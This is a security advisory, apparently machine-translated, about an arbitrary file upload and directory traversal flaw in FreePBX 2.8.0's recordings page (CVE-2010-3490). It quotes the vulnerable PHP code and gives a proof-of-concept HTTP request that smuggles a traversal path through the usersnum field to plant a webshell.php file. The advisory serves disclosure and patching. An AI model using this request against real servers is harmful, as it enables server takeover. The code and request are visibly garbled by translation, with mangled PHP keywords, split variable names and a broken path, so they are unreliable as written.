FreePBX system recording menu Arbitrary File Upload Vulnerability
Release date: 2010-09-23
Updated on: 2010-09-25
Affected Systems:
FreePBX 2.8.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 43454
Cve id: CVE-2010-3490
Previously called Asterisk Management Portal, FreePBX is a standardized implementation of the IP telephone tool Asterisk and provides Web configuration interfaces and other tools.
FreePBX handles file uploads in an insecure way. You can control the file extension and the start part of the uploaded file name through the system record menu on the configuration interface.
The following page. recordings. php code snippet displays the record upload function:
/* Code removed to fit better on advisory */
<? Php
If (isset ($ _ FILES ['ivrfile '] ['tmp _ name']) &
Is_uploaded_file ($ _ FILES ['ivrfile '] ['tmp _ name']) {
If (empty ($ usersnum )){
$ Dest = "unnumbered -";
} Else {
$ Dest = "{$ usersnum }-";
}
$ Suffix = substr (strrchr ($ _ FILES ['ivrfile '] ['name'], "."), 1 );
$ Destfilename = $ recordings_save_path. $ dest. "ivrrecording.". $ suffix;
Move_uploaded_file ($ _ FILES ['ivrfile '] ['tmp _ name'], $ destfilename );
Echo "". $ _ FILES ['ivrfile '] ['name']." $ Rname = rtrim (basename ($ _ FILES ['ivrfile '] ['name'], $ suffix ),'.');
}?>
/* Code removed to fit better on advisory */
When you upload a file, the copy is temporarily saved to the/tmp/directory, the file name consists of the user-controlled-staticname.extension, where:
User-controlled is the $ usersnum variable.
The staticname value is-ivrrecording.
Extension is controlled by users
If the $ usersnum variable is not defined, the static string unnumbered is used.
Finally, when you click the save key on the System Recordings interface, the file will be saved in the/var/lib/asterisk/sounds/custom/directory with the original file name provided by the user.
When uploading files, attackers can manipulate the $ usersnum variable to execute directory traversal attacks and save it to any location accessible to Web Server users, such as Apache DocumentRoot. This allows attackers to upload malicious code to the server and execute it with webserver access permissions.
<* Source: Wendel G. Henrique
Link: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
POST/admin/config. php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
En-US; rv: 1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http: // 10.10.1.3/admin/config. php
Cookie: ARI = cookieValue; PHPSESSID = cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
Boundary = --------------------------- 5991806838789183981588991120
Content-Length: 116089
----------------------------- 5991806838789183981588991120
Content-Disposition: form-data; name = "display"
Recordings
----------------------------- 5991806838789183981588991120
Content-Disposition: form-data; name = "action"
Recordings_start
----------------------------- 5991806838789183981588991120
Content-Disposition: form-data; name = "usersnum"
.../Var/www/html/admin/SpiderLabs
----------------------------- 5991806838789183981588991120
Content-Disposition: form-data; name = "ivrfile"; filename = "webshell. php"
Content-Type: application/octet-stream
<? Php
/* WebShell code goes here */
?>
--------------------------- 5991806838789183981588991120 --
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
FreePBX
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.freepbx.org/trac/ticket/4553